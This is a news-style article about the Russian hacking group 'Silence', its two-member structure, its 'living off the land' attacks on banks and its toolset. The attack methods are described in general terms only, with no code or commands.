By Des Nnochiri
Recent news has broken about a group of hackers which appears to be operating out of Russia. The group, dubbed “Silence,” is believed to be involved in the theft of over $800,000 from multiple Russian and Eastern European financial institutions.
However, what is particularly notable about this group is they seem to count at least one former cyber security professional among their number. This may help explain why the group has gone relatively unnoticed since their first suspected attack back in 2016.
Silence is presently believed to be only a two-man operation, which may be why the amount stolen is relatively small at this stage, but the presence of a member with industry knowledge and experience gives the fledgling organization significant potential.
The cyber security expert will have in-depth knowledge of security protocols and penetration testing, which will allow him to operate within the networks of financial institutions without being detected. This member’s job is to gain access to the target organization’s protected systems and initiate the theft process.
The second is the developer. This member is a highly-skilled computer technician when it comes to reverse engineering, although some errors have been spotted in his code, which suggests he may not be a particularly competent programmer. The developer’s role in Silence is to produce the tools which are used in the attacks and to modify existing software to be exploited.
One of the ways in which the group carries out its attacks is with a technique known as “living off the land”, another way of exploiting existing infrastructure.
Living off the Land Attacks
These kinds of attacks exploit tools which the targets already have installed on their systems or run simple scripts and shellcode directly into computers’ memory.
Living off the land attacks are successful because they require little manpower to initiate, making them ideal for smaller operations such as Silence, and they can hide in plain sight by not creating any new files on the host machine. Most people recognize an attack when suspicious files show up on their hard drive, so if an attacker can avoid this, they stand a greater chance of remaining undetected for long enough to complete their mission.
Living off the land attacks usually begin with a spear-phishing email attack, a strategy that Silence has proven to be very competent at, with the bogus email driving the victim to a website. Once the target has gone to the website, Flash is loaded. Flash is a useful tool for living off the land hackers, as it’s absolutely riddled with security vulnerabilities.
Flash will then force Windows PowerShell to load and will begin instructing the OS through the command line. Remember, this is all happening in your computer’s memory. Nothing is being installed or downloaded onto your machine. Finally, PowerShell connects to the hacker’s stealth server and downloads a malicious script. This script then seeks out sensitive data on the host machine and begins uploading to the hacker’s servers.
The information gathered can then be used for a host of nefarious purposes. At its most basic, the information can be used to steal money. Alternatively, passwords and other security information can give the hacker the ability to conduct ransomware attacks, where the information is held or threatened with public dissemination unless the victim pays the ransom.
At its most high-profile, living off the land can be used to bring down corporations or even attempt to influence elections. One such attack allowed Russian hackers to access thousands of emails from a high-ranking Democrat during the 2016 US Presidential race and may be part of the reason why Hillary Clinton does not presently occupy the White House.
The above process is just one way living off the land attacks can be carried out. An attack has an almost unlimited number of alternative possibilities.
The Silence Toolbox
Silence uses a few proprietary tools to help carry out its attacks.
The eponymous framework is a modular software package which contains four (discovered so far) components.
– Downloader loader
– Main module called Silence and a patched backdoor called Kikothac
– SurveillanceModule, a module for spying on users
– ProxyBot proxy
These modules allow the living off the land attack to be carried out. Once these have been attached to the host machine, the hacker has access to begin the harvesting of data or funds.
This tool is designed specifically for attacking ATMs and allows the attacker to directly control the dispersal of funds. This means they could simply empty the contents of the ATM onto the street in a purely anarchic attack or into the hands of a waiting associate in a much more common financially-motivated crime.
Farse is a tool which can harvest passwords from an infected machine, allowing the attacker access to even more systems, including bank accounts and private email servers, ripe for ransomware crimes.
As its name suggests, Cleaner deletes all evidence of the remote connection once the attack has been completed. This works to the attacker’s favor by increasing the time it will take for the crime to be discovered and further reduce the chances of capture.
Silence is just one of the latest in a long line of hacker organizations out to disrupt our lives and steal our money or data. However, bringing these organizations and their methods out of the shadows and into the light remains our best weapon against them.